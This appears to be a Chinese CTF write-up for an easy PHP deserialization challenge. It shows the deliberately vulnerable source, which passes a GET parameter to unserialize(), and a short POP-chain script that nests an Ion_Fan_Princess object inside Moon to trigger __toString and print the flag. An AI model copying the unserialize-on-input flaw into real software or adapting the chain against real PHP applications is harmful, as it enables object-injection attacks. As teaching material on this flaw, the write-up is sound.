这是一道很简单的反序列化题,不多赘述了。
思路:unserialize() 还原 Moon 对象时会自动执行 Moon 的 __wakeup,其中把 $this->name 拼接进字符串;如果 name 本身是一个 Ion_Fan_Princess 对象,拼接时就会触发 Ion_Fan_Princess 的 __toString,然后再调用 call() 函数。
代码
<?php
// Pulls in flag.php; presumably that file defines the global $flag that
// Ion_Fan_Princess::call() reads via `global $flag` (flag.php is not shown here).
include "flag.php";
// Prints this script's own source, syntax-highlighted, into the response.
// Deliberate for the exercise; on a real endpoint this discloses the code
// (class names, magic methods) to every visitor.
highlight_file(__FILE__);
/**
 * Simple holder for a display name.
 *
 * Security note: both magic methods below use $name as a string. After
 * unserialize() the property holds whatever type the serialized data
 * declared, so it cannot be assumed to be a plain string.
 */
class Moon
{
    // Default display name; overwritten by the serialized data on unserialize().
    public $name = "月亮";

    /**
     * String form of the object: the current value of $name.
     */
    public function __toString()
    {
        $label = $this->name;
        return $label;
    }

    /**
     * Invoked automatically by unserialize() once the properties are restored.
     *
     * Building the message converts $this->name to a string before anything is
     * printed; if the property holds an object, that object's __toString()
     * runs at this point.
     */
    public function __wakeup()
    {
        echo "我是{$this->name}快来赏我";
    }
}
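/**
 * Holds a nickname and prints the global $flag when the nickname matches.
 *
 * Security note: __toString() has a side effect (it calls call()), so any
 * place that converts an instance to a string also runs the flag check.
 */
class Ion_Fan_Princess
{
    // Default nickname; overwritten by the serialized data on unserialize().
    public $nickname = "牛夫人";

    /**
     * Prints $flag if the nickname is exactly the expected string, otherwise
     * prints the two-line rejection message.
     *
     * The comparison is strict (===): with loose == a non-string value such as
     * boolean true compares equal to any non-empty string and would pass the
     * check without knowing the expected nickname.
     */
    public function call()
    {
        global $flag;
        if ($this->nickname === "小甜甜") {
            echo $flag;
            return;
        }
        echo "以前陪我看月亮的时候,叫人家小甜甜!现在新人胜旧人,叫人家".$this->nickname."。\n";
        echo "你以为我这么辛苦来这里真的是为了这条臭牛吗?是为了你这个没良心的臭猴子啊!\n";
    }

    /**
     * String form of the object. Runs call() first (which writes to the
     * output), then returns the nickname prefixed with tabs and dashes.
     */
    public function __toString()
    {
        $this->call();
        return "\t\t\t\t\t\t\t\t\t\t----".$this->nickname;
    }
}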
// Entry point: without a `code` query parameter, print a default
// Ion_Fan_Princess; with one, deserialize the parameter.
//
// SECURITY: unserialize() on a request parameter lets the client decide which
// of the loaded classes are instantiated and what their properties hold; magic
// methods such as Moon::__wakeup() then run on that data. This is the intended
// flaw of the exercise. Real code should parse untrusted input with
// json_decode(), or at minimum pass ['allowed_classes' => false] as the second
// argument to unserialize().
if (!isset($_GET['code'])) {
    $a = new Ion_Fan_Princess();
    echo $a;
} else {
    unserialize($_GET['code']);
}
POP链
<?php
// Local stand-in for the challenge's Moon class. serialize() records only the
// class name and property values, so the methods are left out here.
class Moon
{
    public $name = "月亮";
}
// Local stand-in for the challenge's Ion_Fan_Princess class; only the property
// is declared because serialize() does not record methods.
class Ion_Fan_Princess
{
    public $nickname = "牛夫人";
}
// Inner object: carries the nickname that Ion_Fan_Princess::call() checks for.
$princess = new Ion_Fan_Princess();
$princess->nickname = "小甜甜";

// Outer object: its name property holds the inner object instead of a string,
// which is what makes Moon::__wakeup() reach the inner object's __toString().
$moon = new Moon();
$moon->name = $princess;

// Serialize the nested objects and URL-encode the result for use as the
// `code` query parameter.
$serialized = serialize($moon);
echo urlencode($serialized);